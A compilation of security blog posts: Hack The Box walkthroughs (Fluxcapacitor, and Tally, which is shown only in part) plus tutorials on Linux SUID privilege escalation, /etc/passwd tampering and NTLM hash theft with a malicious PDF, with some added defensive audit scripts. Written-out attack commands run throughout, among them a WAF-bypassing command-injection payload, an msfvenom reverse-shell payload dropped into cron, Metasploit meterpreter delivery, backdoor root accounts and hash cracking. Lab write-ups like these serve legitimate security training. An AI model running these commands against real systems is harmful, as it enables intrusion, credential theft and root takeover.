
Hello friends!! Today we are sharing our experience with the new Hack The Box CTF challenge Fluxcapacitor. Solving this lab is not easy; web penetration testing skills are what you need to get through it. The lab is designed around bypassing a Web Application Firewall (WAF) in order to exploit an OS command injection vulnerability on the machine.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online and therefore have a static IP. Fluxcapacitor has the IP 10.10.10.69.

As we know, the initial stage is enumeration, so we use an nmap version scan to gather information about the target machine and its running services.

nmap -sV 10.10.10.69

From the scan result we learned that port 80 is open for web services and is protected by a web application firewall, "superWAF". We explored the target IP in the web browser but found nothing interesting.

Then we looked into the page source and saw an interesting comment pointing towards the URL /sync, so without wasting time we opened /sync.

LOL!!! It gave a 403 Forbidden error message along with the server banner openresty/1.13.6.1. We searched Google for any exploit related to it but failed to find a working one.

At this point we decided to use Burp Suite to intercept the browser request. After intercepting the HTTP request, the raw request was sent to the Repeater.

Huhhhh!! It gave the same output as in the web browser. Perhaps the WAF was filtering on the User-Agent, such as Mozilla Firefox/5.0.

So we started scrutinising the User-Agent field by replacing the original user-agent content with the random string "raj". Finally!!! It returned the current timestamp, as the comment found in the source code of the home page had disclosed.

Now it was confirmed that superWAF filters on the User-Agent field. We again tried searching Google for an exploit but found nothing specific. Nevertheless, Google gave a little hint about OS command injection, and on that basis we tried a few parameter names in the request, such as /sync?test=ls, which responded with the same timestamp every time. Hence we needed to fuzz for the right parameter name, so we used wfuzz in the next step.

So we used the common.txt wordlist as the parameter-name list and executed the command below. The --hh 19 option hides every response whose body is 19 characters long, i.e. the unchanged timestamp reply, so only parameters that change the response are shown.

wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19

It gave a 403 response for the payload "opt"; let's try opt after /sync and check the response.

Now use the 'opt' parameter to bypass the WAF and execute the ls command through it. HOWEVER, there is again a trick to executing ls, because the WAF will not allow OS command injection directly, which makes exploitation a little tougher. But THANKS to medium.com, because from that site I got the idea of bypassing the WAF with string literal concatenation: adjacent string literals are concatenated by the shell without any operator, so l's' is the same command as ls while the WAF signature for ls never sees the token.

We took help from the website mentioned above and executed three commands, whoami, id and uname, through curl as shown in the image.

curl "http://10.10.10.69/sync?opt=' whoami' "
curl "http://10.10.10.69/sync?opt=' id'"
curl "http://10.10.10.69/sync?opt=' u'n'ame -a' "

Superb!! It was great to know that we had bypassed the WAF successfully, but the task was not completed yet.

Let's seize the user.txt and root.txt files and finish this task. Hhhhhh!!!! Believe me, it is still not easy to bypass the WAF even when the goal is near. Seriously, we put in great effort and at last found user.txt when we executed the commands below.

curl "http://10.10.10.69/sync?opt=' l's' /home'"
curl "http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'"
curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"
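Why a naive signature misses these payloads, shown with a small Python normaliser written for this article (it is not code from the original post or from superWAF): it deletes quote characters before matching command names, the same steps ModSecurity's cmdLine transformation performs. The watch-list and the sample payloads (the opt= values from the curl commands above) are constructed for the demonstration.

```python
import re

# Command names a hypothetical signature rule watches for (constructed watch-list).
WATCHED_COMMANDS = {"ls", "cat", "whoami", "id", "uname", "sudo"}

# Constructed samples: the opt= values sent in the curl commands above, plus one
# un-obfuscated value so the comparison has a baseline.
SAMPLE_PAYLOADS = [
    "' whoami' ",
    "' u'n'ame -a' ",
    "' l's' /home/Fl'uxC'apa'cit'orI'n'c'",
    "' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''",
    "' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='",
    "ls /home",
]


def find_commands(text):
    """Return the watched command names that appear as whole words in text."""
    return {c for c in WATCHED_COMMANDS if re.search(r"\b%s\b" % re.escape(c), text)}


def naive_match(payload):
    """Signature check on the raw parameter value. The quote inside l's' sits
    between the letters, so the word-boundary regex never sees the token ls."""
    return find_commands(payload)


def normalise(payload):
    """Undo shell literal concatenation before matching. Single quotes, double
    quotes, backslashes and carets are deleted (the shell joins adjacent literals
    the same way), whitespace is collapsed and the result is lowercased.
    These are the steps of ModSecurity's cmdLine transformation."""
    text = re.sub(r"[\\\"'^]", "", payload)
    text = re.sub(r"\s+", " ", text).strip()
    return text.lower()


def normalised_match(payload):
    """Signature check on the normalised value."""
    return find_commands(normalise(payload))


def evasions(payloads):
    """List (payload, normalised form, commands) for every payload that the
    naive check misses but the normalised check catches."""
    found = []
    for p in payloads:
        missed = naive_match(p)
        caught = normalised_match(p)
        if caught and not missed:
            found.append((p, normalise(p), caught))
    return found


if __name__ == "__main__":
    for p, norm, cmds in evasions(SAMPLE_PAYLOADS):
        print("%-60r -> %-45r %s" % (p, norm, sorted(cmds)))
```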

Now the goal was the root.txt file. Taking a lesson from the previous experience, I chose to run sudo -l to check the sudo privileges of the current user.

curl "http://10.10.10.69/sync?opt=' sudo -l'"

Awesome!! It told us that we can run a script "monit" with root privileges without a password, which is located in the /home/themiddle/ directory. Let's open it with the cat command.

curl "http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''"

After reading the .monit file, we concluded that the script takes two parameters: a cmd string and a base64 value which it decodes; if the conditions match, it passes the decoded result to bash -c as the command.

Hence it was clear that the 1st parameter must be the string "cmd" and the 2nd is a base64 value to be decoded. So first we generated the base64 value of cat /root/root.txt, because we were well aware of the location of the root.txt file from our previous challenges.

echo "cat /root/root.txt" | base64

Now, with the help of the sudo privilege, execute the command to gain root access and complete the task by grabbing root.txt:

curl "http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='"

HURRAYYYY!!! We hit the goal and successfully found the root.txt file.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Hack the Box Challenge: Fluxcapacitor Walkthrough appeared first on Hacking Articles.


In our previous article we discussed "Privilege Escalation in Linux using etc/passwd file", and today we will learn "Privilege Escalation in Linux using SUID Permission". While solving CTF challenges we always check SUID permissions on files and commands as a route to privilege escalation. It is very important to know what SUID is, how to set SUID and how SUID helps in privilege escalation. You can read our previous articles where we applied this trick for privilege escalation; open the links given below:

Link 1: Hack the Box Challenge: Bank Walkthrough

Link 2: Hack the Box Challenge: Haircut Walkthrough

Let's Start with the Theoretical Concept!!

As we all know, in Linux everything is a file, including directories and devices, and each file has permissions that allow or restrict three operations: read, write and execute. So when you set permissions on a file, you should be aware of which Linux users you are going to allow or restrict for each of the three operations. Take a look at the following image.

Hence it is clear that the maximum value used to set permissions for each user class is 7, which is the sum of read (4), write (2) and execute (1). For example, if you set chmod 755, the permissions will be shown as rwxr-xr-x.

When a special permission is added for a user class it becomes SUID, SGID or the sticky bit. When the extra bit "4" is set for the user (owner) it becomes SUID (Set User ID); when bit "2" is set for the group it becomes SGID (Set Group ID); and when a directory is shared so that other users are allowed to create files inside it, the sticky bit "1" is set on that directory.

What is SUID Permission?

SUID: Set User ID is a type of permission that allows a user to execute a file with the permissions of the file's owner. Files which have the SUID permission run with those higher privileges. Assume we access the target system as a non-root user and find SUID-enabled binaries owned by root; those files/programs/commands will then run with root privileges.

How to set SUID?

Basically, you can change the permission of any file using either the "numerical" method or the "symbolic" method. As a result, x is replaced by s as shown in the image below, which denotes the special execute permission with higher privilege for that particular file/command. Since we are enabling SUID for the owner (user), bit 4 or the symbol s is added in front of the read/write/execute bits.

If you run ls -al with the file name and observe a lowercase 's' as in the image above, it means the SUID bit is enabled for that file and it will run with the owner's privileges, i.e. root privileges when the file is owned by root.

How does SUID help in privilege escalation?

In Linux, some existing binaries and commands can be used by a non-root user to escalate privileges to root if the SUID bit is enabled on them. Some well-known Linux/Unix executables that can allow privilege escalation are: bash, cat, cp, echo, find, less, more, nano, nmap and vim.

Let's get deeper through practical work. First, create a user that is not a member of the sudo group. Here we have added the user "ignite" whose UID is 1001 and GID is 1001; hence ignite is a non-root user.
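As an added example (not code from the article), a Python auditor that does programmatically what the find command used later in this article does by hand: it walks the filesystem, renders the mode bits exactly as ls -al shows them (the s in place of x), and ranks root-owned SUID files against the list of risky binaries named above. The watch-list and the sample entries are constructed for the demonstration.

```python
import os
import stat

# Binaries the article names as dangerous when setuid root (constructed watch-list).
DANGEROUS_SUID = {"bash", "cat", "cp", "echo", "find", "less", "more",
                  "nano", "nmap", "vim", "vim.basic"}


def mode_string(mode):
    """Render permission bits the way ls -al does: 0o4755 -> 'rwsr-xr-x'.
    A lowercase s means SUID/SGID plus execute; uppercase S means the special
    bit is set but the execute bit is missing (the 4644 case)."""
    bits = [(stat.S_IRUSR, "r"), (stat.S_IWUSR, "w"), (stat.S_IXUSR, "x"),
            (stat.S_IRGRP, "r"), (stat.S_IWGRP, "w"), (stat.S_IXGRP, "x"),
            (stat.S_IROTH, "r"), (stat.S_IWOTH, "w"), (stat.S_IXOTH, "x")]
    out = [ch if mode & bit else "-" for bit, ch in bits]
    if mode & stat.S_ISUID:
        out[2] = "s" if mode & stat.S_IXUSR else "S"
    if mode & stat.S_ISGID:
        out[5] = "s" if mode & stat.S_IXGRP else "S"
    if mode & stat.S_ISVTX:
        out[8] = "t" if mode & stat.S_IXOTH else "T"
    return "".join(out)


def classify(path, mode, owner_uid):
    """Return a finding for a regular file with SUID or SGID set, else None.
    Severity: high = root-owned SUID binary on the watch-list, medium = any other
    root-owned SUID file (compare it against a package baseline), low = the rest."""
    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    severity = "low"
    if owner_uid == 0 and mode & stat.S_ISUID:
        severity = "high" if os.path.basename(path) in DANGEROUS_SUID else "medium"
    return {"path": path, "mode": mode_string(mode),
            "owner_uid": owner_uid, "severity": severity}


def audit(entries):
    """entries: iterable of (path, st_mode, st_uid). Returns findings, worst first."""
    rank = {"high": 0, "medium": 1, "low": 2}
    findings = [f for f in (classify(p, m, u) for p, m, u in entries) if f]
    return sorted(findings, key=lambda f: (rank[f["severity"]], f["path"]))


def walk_filesystem(root="/"):
    """Live equivalent of 'find / -perm -u=s -type f': yield (path, mode, uid)
    for every regular file; symlinks are not followed and unreadable paths skipped."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


# Constructed sample entries (what walk_filesystem might yield on the lab box).
SAMPLE_ENTRIES = [
    ("/bin/cp", 0o104755, 0),               # chmod u+s /bin/cp as in the article
    ("/usr/bin/vim.basic", 0o104755, 0),    # the vim case
    ("/usr/bin/passwd", 0o104755, 0),       # legitimately setuid root
    ("/home/ignite/tool", 0o104755, 1001),  # setuid, but owned by uid 1001
    ("/bin/ls", 0o100755, 0),               # no special bits: not reported
]

if __name__ == "__main__":
    for f in audit(SAMPLE_ENTRIES):
        print("%-6s %s uid=%d %s" % (f["severity"], f["mode"], f["owner_uid"], f["path"]))
```

Replace SAMPLE_ENTRIES with walk_filesystem() to run it against a live host; a root-owned SUID file that is not in the distribution's package list is the one to investigate.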

Privilege Escalation using Copy Command

If the SUID bit is enabled on the cp command, which is used to copy data, it can lead to privilege escalation and root access. For example, suppose you (the system admin) want to give SUID permission to the cp command. Then you may follow the steps below to identify its location and current permissions, after which you can enable the SUID bit by changing the permission.

which cp
ls -al /bin/cp
chmod u+s /bin/cp

1st Method

On the other hand, start your attacking machine, first compromise the target system and then move to the privilege escalation phase. Suppose I successfully log in to the victim's machine through SSH and get a non-root user's terminal. Then, using the following command, you can enumerate all binaries with SUID permission.

find / -perm -u=s -type f 2>/dev/null

In the image above you can observe that it shows many files, but we are interested in /bin/cp, because now we can copy the /etc/passwd file to read the user list. Therefore I copied the passwd file into the HTML directory.

cp /etc/passwd /var/www/html

On the other hand, we generated a new encrypted password for pass123 using openssl passwd.

Since we copied the passwd file into the web directory, i.e. /var/www/html, I can open it through the web browser, copy the entire content of the passwd file into a text file, and then add our own user with root UID, GID and home directory.

In our previous article we already discussed how to add a user to /etc/passwd using the openssl passwd utility.

Run a Python HTTP server to transfer our edited passwd file to the target machine.

python -m SimpleHTTPServer 80

As we all know, the /tmp directory allows anyone to create or delete files there, so we downloaded our passwd file into it. Once it was downloaded, we copied /tmp/passwd over /etc/passwd, which overwrites the original passwd file.

cd /tmp
wget http://192.168.1.108/passwd
cp passwd /etc/passwd

With the help of the tail command we ensured that our user "hack" is now part of the /etc/passwd file. Since we added our own user with root privileges, let's switch to it and get root.

su hack
whoami

And Yessssssss!! This is an incredible way to escalate to root privileges.

2nd Method

Similarly, we can also transfer a backdoor to the target system if the SUID bit is enabled on cp. Here we have generated a netcat backdoor for a reverse connection using the msfvenom command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

Then copy the highlighted code above, paste it into a text file beginning with #!/bin/bash, and it is ready to be transferred to the target system; I have saved it as raj.sh.

Now, we are all aware of the Linux crontab utility that runs files hourly, daily, weekly and monthly, so I copied raj.sh into /etc/cron.hourly. Hence it will run raj.sh within the next hour.

cp raj.sh /etc/cron.hourly/
ls -al /etc/cron.hourly/

On the other hand, we started a netcat listener in a new terminal, and as the hour passed it gave us a reverse connection from the target system with root privileges.

Hence we saw how a single cp command can lead to privilege escalation if the SUID bit is on. You can try your own way of escalating to root using the cp command.

Privilege Escalation Using Find Command

Similarly, we can escalate to root if the SUID bit is on for the find command. For example, suppose you (the system admin) want to give SUID permission to the find command. Then you may follow the steps below to identify its location and current permissions, after which you can enable the SUID bit by changing the permission.

which find
ls -al /usr/bin/find
chmod u+s /usr/bin/find

Again compromise the target system and then move to the privilege escalation phase as done above. Then, using the following command, you can enumerate all binaries with SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that the SUID bit is enabled on the find command, which means we can execute any command through find's -exec action. To do so, first create an empty file "raj" and then run the whoami command as shown below.

touch raj
find raj -exec "whoami" \;

If an attacker finds the SUID bit set on /usr/bin/find, it allows him to execute any malicious command, such as spawning a netcat or /bin/bash shell, or to fetch important system information for privilege escalation.

Privilege Escalation Using Vim

Similarly, we can escalate to root if the SUID bit is on for the Vim editor. For example, suppose you (the system admin) want to give SUID permission to the Vim editor. Then you may follow the steps below to identify its location and current permissions, after which you can enable the SUID bit by changing the permission.

which vim
ls -al /usr/bin/vim
ls -al /etc/alternatives/vim
chmod u+s /usr/bin/vim.basic

You will find vim.basic by following the symlinks, as shown in the image below.

Again compromise the target system and then move to the privilege escalation phase as done above. Then, using the following command, you can enumerate all binaries that have SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that the SUID bit is enabled on /usr/bin/vim.basic, and hence we can now edit through vim any file that is otherwise editable only by the sudo or root user.

As we know, ignite is a non-root user with the least permissions, but since vim has SUID permission we can edit the sudoers file through it and change the permissions of user "ignite". So we open the sudoers file by typing the visudo command and give all permissions to user "ignite" as shown in the image.

ignite   ALL=(ALL:ALL) ALL

Now let's get a root shell as shown in the image below.

sudo -l
sudo bash
id

Great!! This trick also works superbly for privilege escalation.

Privilege Escalation using Saved Script

There is a good chance of finding some kind of script for a system or program call; it can be any script, whether PHP, Python or C. Suppose you (the system admin) want to give SUID permission to a C program that provides a bash shell on execution.

So here we have coded a C program that calls system() to spawn a bash shell and saved it as "asroot.c".

Then create a rootshell directory inside /bin, copy the asroot.c file into it and run the gcc compiler to compile it.

mkdir /bin/rootshell
cd /bin/rootshell
cp /home/raj/Desktop/asroot.c .
ls
gcc asroot.c -o shell
chmod u+s shell
ls -al shell

Now again compromise the target system and use the find command to identify binaries with SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that the SUID bit is enabled on many binaries, but we are interested in /bin/rootshell/shell. So we move into the /bin/rootshell directory and run the binary "shell", and as a result we get root access as shown below.

cd /bin/rootshell
./shell
id

Thus we saw how we can escalate to root if the SUID bit is enabled on such a script. Although it is unlikely to find a script that directly calls a bash shell, if you find any script with SUID permission you can modify its content using the techniques above to get a bash shell.

Privilege Escalation Using Nano

Similarly, we can escalate to root if the SUID bit is on for the nano editor. For example, suppose you (the system admin) want to give SUID permission to the nano editor. Then you may follow the steps below to identify its location and current permissions, after which you can enable the SUID bit by changing the permission.

which nano
ls -al /bin/nano
chmod u+s /bin/nano

Again compromise the target system and then move to the privilege escalation phase as done above. Then, using the following command, you can enumerate all binaries with SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that the SUID bit is enabled on /bin/nano, so now let's open the /etc/passwd file and add our own user as done above using openssl passwd.

On the other hand, I generated a new encrypted password for 123 using openssl passwd.

Now open the passwd file with the nano editor and add your own user as done above. Here you can observe that I have created a demo user with the encrypted password on the victim's system.

nano /etc/passwd

Since we added our own user with root privileges, let's switch to it and get root.

su demo
id

2nd Method

If the SUID bit is enabled on /bin/nano, we can also steal password hashes from the /etc/shadow file. So after compromising the target machine we opened the shadow file in the nano editor and copied the encrypted password set for user raj.

Now paste the copied hash into a text file saved as "hash" on the desktop, then use John the Ripper to crack it as shown below. It gave raj:123 as the password; now try to log in to the target system through the raj account.

So today we have demonstrated how the SUID permission can lead to privilege escalation even when it is granted to ordinary commands and programs such as cp, cat, nano and vim.


The post Linux Privilege Escalation using SUID Binaries appeared first on Hacking Articles.


Today we are demonstrating how NTLM hashes can be stolen through a PDF file. We already discussed various methods to capture NTLM hashes in a network in our previous article. Recently a new tool, "Bad-PDF", was released, and in this article we share our experience with it.

Bad-PDF creates a malicious PDF to steal NTLM (NTLMv1/NTLMv2) hashes from Windows machines; it utilises a vulnerability disclosed by the Check Point team to create the malicious PDF file. Bad-PDF reads the NTLM hashes using the Responder listener.

This method works for all PDF readers (any version) and JavaScript is not required for this attack; most EDR/endpoint solutions fail to detect it.

git clone https://github.com/deepzec/Bad-Pdf.git
cd Bad-Pdf
ls
chmod 777 badpdf.py

Now run the Python file with the following command:

python badpdf.py

It will then try to connect to Responder through its default path, i.e. /usr/bin/responder, but in our case the location of Responder is /usr/sbin/responder. After that it will ask for your network IP, the name of the output file and the interface name; submit this information as per your network.

It will then create a malicious PDF file named bad.pdf; now transfer this PDF file to your target.

So when the victim opens our malicious file, his NTLM hash is captured as shown in the image below. Here you can observe the username 'raj' along with its password hash. Now copy the hash value into a text document so that you can crack it to retrieve the password.

We pasted the hash value into a text file and saved it as "hash" on the desktop. Later we used John the Ripper to crack the hash.

john hash

Awesome!!! We have retrieved the password 133 for user raj.

The post Capture NTLM Hashes using PDF (Bad-Pdf) appeared first on Hacking Articles.


In this article we will learn "Various methods to alter the /etc/passwd file to create or modify a user for root privileges". Sometimes it is necessary to know how to edit your own user inside /etc/passwd for privilege escalation once the target is compromised. You can read our previous articles where we applied this trick for privilege escalation; open the links given below:

Link 1: Hack the Box Challenge: Apocalyst Walkthrough

Link 2: Hack the Hackday Albania VM (CTF Challenge)

Firstly, we should understand the /etc/passwd file in depth before getting to the point. Inside the /etc directory we find three of the most important files: passwd, group and shadow.

/etc/passwd: a human-readable text file which stores user account information.

/etc/group: also a human-readable text file which stores group information; which group a user belongs to can be identified through this file.

/etc/shadow: a file that contains the encrypted passwords and account expiry information for every user.

The format of entries in the /etc/passwd file

Let's get into its detailed description.

Username: the first field indicates the name of the user, which is used to log in.

Encrypted password: an x denotes that the encrypted password is actually stored inside the /etc/shadow file. If the user does not have a password, the password field will contain an * (asterisk).

User ID (UID): every user must be allotted a user ID (UID). UID 0 (zero) is reserved for the root user, UIDs 1-99 are reserved for other predefined accounts, and UIDs 100-999 are reserved by the system for administrative purposes. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given UID 1001.

Group ID (GID): denotes the primary group of each user; like UIDs, the first 100 GIDs are usually reserved for system use. GID 0 corresponds to the root group and GID 1000 usually signifies the users. New groups are generally allotted GIDs beginning from 1000.

GECOS field: usually a set of comma-separated values giving more details about the user. The GECOS field holds the following information:

User’s full name

Building and room number or contact person

Office telephone number

Home telephone number

Any other contact information

Home directory: the path of the user's home directory, where all his files and programs are stored. If no directory is specified, / becomes the user's directory.

Shell: the full path of the default shell that executes the user's commands and displays the results.

NOTE: each field is separated by a : (colon).

Let’s Start Now!!

Adding User by Default Method

Let's first open the /etc/passwd file with the cat command to view the users currently present on our system.

From the image above, you can see that "raj" is the last user, with UID 1000. Here GID 1000 denotes that it is a non-system user.

Let's see what actually happens in the passwd file when we add a user with the adduser command. Here you can clearly match the following information against the image below.

adduser user1

Username: user1

GID: 1002

UID: 1001

Enter password: (Hidden)

Home Directory: /home/user1

GECOS field: Full Name, Room Number, Work Phone, Home Phone, Other (left blank)

When you open the passwd file, you will notice that all of the above information has been stored inside /etc/passwd.

Manually Editing User inside /etc/passwd File

Generally a normal user has read-only permission on the passwd file, but sometimes a user has read/write permission; in that scenario we can add our own user inside /etc/passwd with the help of the theory above.

user2:*:1002:1003:,,,:/home/user2:/bin/bash

The * (asterisk) sign denotes an empty password for user2.

Since we have allotted GID 1003 to user2, we need to add it to the /etc/group file too.

Follow the format given below:

Syntax: Username:X:GID

Since we don't have a password, use the * sign in place of x.

user2:*:1003

Now set a password for user2 with the passwd command and enter the password.

passwd user2

Since we created the new user 'user2' manually without using the adduser command, we will not find a new entry in the /etc/shadow file. But it is there in /etc/passwd, where the * sign has been replaced by the encrypted password value. In this way we can create our own user for privilege escalation.
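An added example, not from the article: a Python parser for the seven-field format described above, with an audit that flags exactly the edits this section describes (a second uid-0 account, a hash written into passwd in place of x, an empty password field, duplicate uids), so a defender can spot them in the file. The sample passwd text and its hash strings are constructed placeholders.

```python
# Constructed sample /etc/passwd text, modelled on the accounts discussed in the
# article. The hash strings are placeholders, not real crypt output.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
user1:x:1001:1002:,,,:/home/user1:/bin/bash
user2:$6$salt$CONSTRUCTEDHASH:1002:1003:,,,:/home/user2:/bin/bash
user3:$1$user3$CONSTRUCTEDHASH:0:0::/root/root:/bin/bash
guest::1005:1005:,,,:/home/guest:/bin/bash
broken:x:1004:1004:no shell field
"""

FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")
LOCKED = {"x", "*", "!", "!!"}   # markers meaning "look in shadow" or "locked"


def parse_passwd(text):
    """Split passwd lines into dicts. Returns (entries, errors); a malformed line
    is reported rather than silently skipped, because a file edited by hand is
    exactly the case where the format goes wrong."""
    entries, errors = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            errors.append((lineno, "expected 7 colon-separated fields, got %d" % len(parts)))
            continue
        entry = dict(zip(FIELDS, parts))
        try:
            entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        except ValueError:
            errors.append((lineno, "non-numeric uid or gid"))
            continue
        entry["line"] = lineno
        entries.append(entry)
    return entries, errors


def audit_passwd(entries):
    """Flag the manipulations described in the article: an extra uid-0 account,
    a hash written straight into passwd instead of shadow, an empty password
    field, and duplicate uids."""
    findings = []
    by_uid = {}
    for e in entries:
        name, pw = e["name"], e["password"]
        by_uid.setdefault(e["uid"], []).append(name)
        if e["uid"] == 0 and name != "root":
            findings.append((name, "uid 0 account that is not root"))
        if pw == "":
            findings.append((name, "empty password field: login without a password"))
        elif pw not in LOCKED:
            findings.append((name, "password hash stored directly in /etc/passwd"))
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1:
            findings.append((",".join(names), "duplicate uid %d" % uid))
    return findings


def audit_file(path="/etc/passwd"):
    """Run the same checks against a real file; returns (findings, errors)."""
    with open(path) as fh:
        entries, errors = parse_passwd(fh.read())
    return audit_passwd(entries), errors


if __name__ == "__main__":
    entries, errors = parse_passwd(SAMPLE_PASSWD)
    for lineno, msg in errors:
        print("line %d: %s" % (lineno, msg))
    for who, msg in audit_passwd(entries):
        print("%-12s %s" % (who, msg))
```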

Openssl

Sometimes it is not possible to execute the passwd command to set a user's password; in that case we can use the openssl command, which generates an encrypted password with a salt.

openssl passwd -1 computes the hash of the given password using the salt string and the MD5-based BSD password algorithm 1.

Syntax: openssl passwd -1 -salt [salt value] {password}

openssl passwd -1 -salt user3 pass123

We will get the encrypted password; after that, open the passwd file by typing the vipw command in the terminal and add the username manually. Follow the manual steps for adding the new user "user3" and paste the encrypted value in place of * or x for the password.

In the image below you can observe that I have allotted UID 0 and GID 0 and the home directory /root/root; hence we have given root privileges to our user3.

Now switch user, access the terminal as user3 and confirm root access.

su user3
whoami
id

YESSSSSS it is working successfully.

Note: you can also modify another user's password by replacing its :x: field with your own encrypted password and logging in to that account with your password.

mkpasswd

mkpasswd is similar to openssl passwd; it generates a hash of the given password string.

Syntax: mkpasswd -m [hash type] {password}

mkpasswd -m SHA-512 pass

It will generate a hash of your password string; repeat the steps above, or change the password of an existing user.

If you compare the entry of user1 you can notice the difference: we replaced :x: with our hash value.

Now switch user, access the terminal as user1 and confirm root access.

su user1
whoami
id

Great!! It is also working.

Python

Using Python we can import the crypt library and add a salt to our password, which creates the encrypted password including that salt value.

python -c 'import crypt; print(crypt.crypt("pass", "$6$salt"))'

It will generate a hash of your password string; repeat the steps above, or change the password of an existing user. If you compare the entry of user2 you can notice the difference: we replaced the old hash value with our new hash value.

Now switch user, access the terminal as user2 and confirm root access.

su user2
whoami
id
pwd
sudo -l

It is also working; previously its home directory was /home/user2, but after moving it to /root you can notice it has all the privileges of the root user.

Perl

Similarly, we can use Perl along with crypt to generate a hash of our password using a salt value.

perl -le 'print crypt("pass123", "abc")'

You will get the encrypted password; after that, open the passwd file again by typing the vipw command in the terminal and add the username manually. Follow the manual steps for adding the new user "user4" and paste the encrypted value in place of * or x for the password.

In the image below you can observe that I have allotted UID 0 and GID 0 and the home directory /root/root; hence we have given root privileges to our user4.

Now switch user, access the terminal as user4 and confirm root access.

su user4
whoami
id

Great!! This method is also working.

PHP

Similarly, we can use PHP along with crypt to generate a hash of our password using a salt value.

php -r "print(crypt('aarti','123') . \"\n\");"

You will get the encrypted password; after that, open the passwd file by typing the vipw command in the terminal and add the username manually. Follow the manual steps for adding the new user "user5" and paste the encrypted value in the password field.

In the image below you can observe that I have allotted UID 0 and GID 0 and the home directory /root/root; hence we have given root privileges to our user5.

Now switch user, access the terminal as user5 and confirm root access.

su user5
whoami
id

Hence there are many ways to add your own user with root access, which is quite helpful for getting root privileges on any machine.

The post Privilege Escalation in Linux using etc/passwd file appeared first on Hacking Articles.


Hello Friends!! Today we are going to solve the CTF challenge "Tally". It is a lab developed by Hack the Box. They have an amazing collection of online labs on which you can practise your penetration testing skills, designed for everyone from beginners to expert penetration testers. Tally is a retired lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, they have a static IP. The Tally lab has the IP 10.10.10.59.

Now, as always, let's begin our hacking with port enumeration.

nmap -p- -A 10.10.10.59

When you explore the target IP through the browser, it redirects to a SharePoint page as shown below, which nmap also reported in the image above.

Then we used several directory brute-forcing tools to enumerate useful web directories but failed. So I explored the web directories manually with the help of Google search and slowly but surely reached /sitepages/FinanceTeam.aspx, where I found the FTP username as shown in the image below.

Moreover, I found a link about SharePoint directory brute-force attacks that helped me in my next step.

From the link above we found the URL http://10.10.10.59/shared documents/forms/allitems.aspx; when you open this path in your browser, as shown below, you will see a file named "ftp-details". Download this doc file and open it.

You will get the password from inside the ftp-details doc file.

Now log in to FTP using the following credentials and download tim.kdbx to your local machine.

Username: ftp_user
Password: UTDRSCH53c"$6hys

Since the file has the .kdbx extension and I didn't know much about it, I turned to Google search, where I found this link to download a Python script that extracts a HashCat/John crackable hash from KeePass 1.x/2.x databases.

python keepass2john.py tim.kdbx > tim

Next, we used John the Ripper to crack the hash in "tim" with the following command.

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim

Once you obtain the password for "keepass2", an application used to store your passwords, you need to install it (keepass2) with the following command:

apt-get install keepass2 -y

After installing, run the command below and submit "simplementeyo" in the master key field.

keepass2 tim.kdbx

Then you can find a username and password inside /Work/Windows/Shares for SMB login, since ports 135-445 are open on the target machine for file sharing.

Here the password is hidden behind * characters; copy and paste it into a text file and you will get the password in plain text, i.e. Acc0unting.

Now that you have the SMB login credentials "Finance:Acc0unting", execute the following command to connect to the target; it will show "ACCT" as a share name.

smbclient -L 10.10.10.59 -U Finance

Further, type the commands below and, when you find conn-info.txt, download it.

smbclient //10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt

When you will download conn-info.txt file, open it, it will tell you MSSQL database login credential.

db: sa
pass: YE%TJC%&HYbe5Nw

From the image below you can observe that these are old server details, so the password for sa may have been changed since.

Log in to SMB again and look for the next hint in /zz_Migration by running the commands below:

smbclient //10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New folder"

Here you will find tester.exe; download it.

get tester.exe

tester.exe is saved in your /root directory. Since the file is large, it is impractical to search it by hand for the information we want, so use the strings command together with grep.

strings tester.exe | grep DATABASE

This yields a new password for user sa, as shown in the image below.

For the next step I took help from our previous article on MSSQL penetration testing. Open a new terminal, start the Metasploit framework and run the commands below.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted .dll command text and paste it as the CMD value, as shown in the next image.

Now open a new terminal, start a second Metasploit instance and run the commands below.

